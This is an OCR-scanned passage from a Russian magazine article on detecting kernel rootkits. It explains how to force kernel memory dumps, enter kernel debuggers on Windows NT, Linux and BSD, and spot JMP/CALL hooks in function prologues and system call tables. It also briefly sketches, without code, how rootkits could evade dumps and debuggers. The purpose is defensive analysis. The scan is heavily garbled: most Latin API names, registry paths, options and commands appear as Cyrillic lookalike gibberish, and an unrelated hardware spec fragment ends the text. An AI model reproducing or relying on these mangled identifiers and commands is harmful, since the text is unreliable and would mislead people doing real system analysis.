функций, внедрение в которые существенно усиливает жизнестойкость 
руткита (механизм РаИсйСиагб, реализованный в х86-64 версиях ГѵГГ, мы не 
рассматриваем, поскольку его очень легко обойти). 

Собственно говоря, при всем различии N1 и Ьтих/ВЗБ техника поиска рут- 
китов одна и та же. Первым делом нам необходимо заполучить дамп ядра или 
запустить ядерный отладчик. Теоретически руткиты могут перехватывать 
любые операции, в том числе и попытку сохранения дампа. В ГѵГГ для этого 
им достаточно перехватить ІѵІагіѵеАРІ-функцию КеВи^СЬескЕх и, прежде чем 
возвратить ей управление, вычистить все следы своего пребывания в опе- 
ративной памяти. Технически реализовать это несложно. Понадобится не 
больше пары сотен строк ассемблерного кода, но . . . мне не известен ни один 
руткит, реально делающий это. Также можно обхитрить и ядерный отладчик. 
Устанавливаем всем хакнутым страницам атрибут только на исполнение 
(если ЦП поддерживает бит ИХ/ХЛ) или ставим страницу в Ж)_АССЕЗЗ, а 
при возникновении исключения смотрим, пытаются ли нас прочесть или 
исполнить. И если нас читают, то это явно отладчик, для обмана которого 
временно снимаем перехват. Но это всего лишь теория. На практике она еще 
никем не реализована, и когда будет реализована — неизвестно. 

Увы, абсолютно надежных способов детекции руткитов не существует, и на 
любую меру есть своя контрмера. Но не будем теоретизировать, вернемся 
к реально существующим руткитам, а точнее, к получению дампа памяти. 
В №Г в «Свойствах системы» ( < ѴѴіп-Раизе > ) необходимо выбрать «Полный 
дамп», затем запустить «Редактор реестра», открыть ветвь НКЬМ\Зуз1:ет\ 
Сиггеп1:СоШгоІ5еЛ5егѵісе5\і8042рг1:\Рагате1:ег5 и установить параметр 
СгазЬОпСітІЗсгоІІ (типа ВЕС_ОѴѴОИЭ) в любое ненулевое значение, 
после чего нажатие <Ссг1> с последующим двойным нажатием <Раизе> 
вызовет голубой экран с кодом Е2Ь (МАН11АЬЬУ_1Н1Т1АТЕЛ_СРА5Н) . К 
сожалению, чтобы изменения реестра вступили в силу, необходимо пере- 
загрузить машину, прибив при этом руткит, который мы пытаемся найти, 
так что эту операцию следует осуществлять заблаговременно. 

Кстати говоря, последовательность <Сі:г1-5сго1ІЕоск-5сго1ІЕоск> 



срабатывает, даже если машина ушла в нирвану и уже не реагирует на 
<СЕг1-АІЕ-Ое1> . Причем, в отличие от КЕЗЕТ, комбинация <СЕг1-5сго11 
Ьоск-ЗсгоП Ьоск> выполняет сброс дисковых буферов, что уменьшает 
риск потери данных, поэтому СгазІЮпСітІЗсгоІІ стоит настроить и в том 
случае, когда мы не собираемся охотиться на руткиты. 

В тех случаях, когда СгазІЮпСітІЗсгоІІ не настроен, а перезагрузка не 
приемлема, можно взять любой драйвер из ШТЮК и вставить в начало 
ОгіѵегЕпіту какую-нибудь недопустимую операцию: деление на ноль, 
обращение к памяти по нулевому указателю и т.д. Тогда при загрузке 
драйвера немедленно вспыхнет голубой экран, а на диск будет сброшен 
полный дамп памяти ядра со всей малварью, в нем содержащейся. 

В Ілпих ручной сброс дампа осуществляется при нажатии < Ак-ЗузК^-С > 
(при этом ядро должно быть откомпилировано с параметром С(ЖРІС_ 
МАСІС_5УЗК(2, равным «уез», или должна быть выполнена команда «еско 1 
> /ргос/зуз/кегпеі/зузщ»). 

В хВЕБ-системах комбинация < СТгІ-АІТ-Езс > (кстати говоря, изменен- 
ная в некоторых раскладках клавиатуры) вызывает всплытие ядерного 
отладчика (аналог < СигІЮ > для ЗоМСЕ в 1МТ) , который, к сожалению, по 
умолчанию не входит в ядро, и потому его необходимо предварительно 
перекомпилировать, добавив строки «оргіопз ОБВ» и «оргіопз ВКЕАК_ 
ТСМЭЕВІКлСЕК» в файл конфигурации ядра. Если же последняя опция не 
обозначена (о ней часто забывают), то в отладчик можно войти из консоли 
командой «зузсіі беЪи§.епЩг_беЪи§§ег=с1с1Ъ». Полученный дамп ядра 
можно анализировать любой сподручной утилитой, благо недостатка в них 
ощущать не приходится. Например, в ЫТ д ля этой цели обычно использует- 
ся ѴѴіпЕ)Ъ§, но мыщъх предпочитает исследовать систему вживую с помо- 
щью ВоМСЕ, ближайшим аналогом которого в мире Ілпих является ІлпІСЕ. 
Значит, нажимаем мы <Сіт1-0> (ВоМСЕ), <СМ-(2> (ІлпІСЕ) или <СМ- 
Ак-Езо (хВВО) и оказываемся в ядре. Далее пишем «и имя_функции» и 
последовательно перебираем имена всех функций (ну или не всех, а самых 
соблазнительных для перехвата), список которых под Г\ГГ можно получить 
командой «битрЬіп.ехе пшзкгпі.ехе /ехрогГ > оШриН.Ш» (где битрЬіп.ехе 
— утилита, входящая в состав Місгозок Ѵізиаі Зшсііо и Ріагіогт ВБК) . А под 
Ілпих/хВЗП эту же задачу можно решить, изучив символьную информа- 
цию несжатого и нестрипнутого ядра. 

В начале нормальных, неперехваченных функций должен находиться стан- 
дартный пролог вида «РІІВН ЕВР/МОѴ ЕВР, ЕВР» или типа того. Если же туда 
воткнут ЛѴ1Р или САЬЪ, то с вероятностью, близкой к единице, данная функ- 
ция кем-то перехвачена. А вот кем — это вопрос. Кроме руткитов перехва- 
том занимаются антивирусы, брандмауэры и другие программы, поэтому, 
прежде чем отправляться на поиск малвари, необходимо хорошо изучить 
особенности своей системы со всеми установленными приложениями. 
Продвинутые руткиты внедряют ЛѴІР/С АЫ. не в начало функции, а в ее 
середину, чтобы не вызывать подозрений. На самом деле, проанализиро- 
вав код хакнутой функции, легко убедиться в некоторой его ненормаль- 
ности. Левый ЛМР/САИ, просто не вписывается в алгоритм! Однако, чтобы 
прийти к подобному заключению, необходимо не только знать ассемблер, 
но и иметь опыт дизассемблирования. К счастью, продвинутые руткиты 
встречаются достаточно редко, и подавляющее большинство из них внед- 
ряется в самое начало. 

Просмотрев все функции и убедившись в отсутствии следов явного 
перехвата, приступаем к изучению таблицы системных функций, ко- 
торая под ЗоМСЕ вызывается командой МТСАІХ, а под ІлпІСЕ — коман- 
дой Б зуз_са11_1:аЫе. Поскольку функции, перечисленные в таблице, не 
экспортируются ядром ГѵГГ, то в отсутствие символьной информации 
(которую можно получить с сервера МісгозоЛ с помощью утилиты 
ЗутЪоІКеітіѵег от ЫиМе§а) ЗоМСЕ отображает имя ближайшей экспорти- 
руемой функции плюс смещение. А потому мы не можем быстро сказать: 
перехвачена данная функция или нет, и нам придется набирать команду «и 
адрес_функции», чтобы посмотреть, что там находится: нормальный, не- 
перехваченный пролог или ЛѴІР/САІХ. В никсах информация о символах 
присутствует по умолчанию и подобных проблем не возникает. 
Естественно, помимо описанных существуют и другие методики 
перехвата, используемые руткитами, однако они довольно сложны для 
понимания и требуют предварительной подготовки, а потому здесь не 
рассматриваются. пс 
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Процессор: АІѴЮ АІИІоп™ 64 Х2 6000+ / Память: 2048МВ / 
Жесткий диск: 250СЬ / Видео: 256МЬ СеРогсе 8600СТ / 
ОѴО±КѴѴ / Карт-ридер / ОС: ѴѴіпсІоѵѵз Ѵізіа Ноте Вазіс / 
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